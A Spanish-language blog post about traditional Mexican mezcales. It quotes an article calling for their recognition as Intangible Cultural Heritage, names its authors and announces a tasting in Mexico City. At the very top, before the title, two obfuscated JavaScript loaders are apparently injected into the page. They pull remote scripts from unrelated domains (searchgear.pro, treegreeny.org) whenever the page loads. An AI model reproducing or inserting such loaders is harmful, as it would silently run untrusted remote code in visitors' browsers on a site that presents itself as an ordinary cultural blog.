;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 42. Protejamos los mezcales tradicionales

42. Protejamos los mezcales tradicionales


Bajo el título “Mezcales artesanales tradicionales de México: Patrimonio Cultural Inmaterial de la humanidad”, apareció un artículo en Artes de México en el #98 (ver impreso.milenio.com/node/8804775). Cito: “Elaborados con base en prácticas y saberes milenarios, los mezcales artesanales de México son una rica tradición viva en nuestras poblaciones indígenas y mestizas. Sus dimensiones culturales son múltiples, y sus procesos y productos son altamente complejos, refinados y diversos. Su elaboración involucra dos ámbitos que se determinan mutuamente. Por un lado, está el vasto conocimiento sobre las variedades de maguey con las que se producen y sobre su interacción con los agroecosistemas tradicionales, también milenarios, de los que forman parte. Y por otro, está la minuciosa sabiduría de las habilidades artesanales y sensoriales necesarias para su creación. Ambos son transmitidos oralmente, y recreados y perfeccionados continuamente en las comunidades vinculadas con esta tradición.”
El texto, además, convoca: “Invitamos a todos los interesados en estos mezcales a colaborar con su conocimiento y entusiasmo en la elaboración y promoción de la declaratoria de los mezcales artesanales tradicionales de México como Patrimonio Cultural Inmaterial de la Humanidad. Conseguirla será fundamental para salvaguardar este patrimonio, y contribuirá a la cohesión social de los pueblos ejecutores, al reconocerse como depositarios de una misma y rica tradición.”
Los autores fueron: Patricia Colunga y Daniel Zizumbo del Centro de Investigación Científica de Yucatán; Abisaí García del Instituto de Biología, UNAM; Catarina Illsley, del Grupo de Estudios Ambientales; Eduardo Quintanar de la CONABIO; Mari Carmen Serra Puche, del Instituto de Investigaciones Antropológicas, UNAM y Cornelio Pérez, de Mezcales Tradicionales de los Pueblos de México.
Para saborear mezcales de Mezquital, Durango, de maguey Cenizo y Tepemete, hay que acudir a Red Fly el martes a las 20 horas: Orizaba 145, Roma, DF.
http://impreso.milenio.com/node/8837897

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *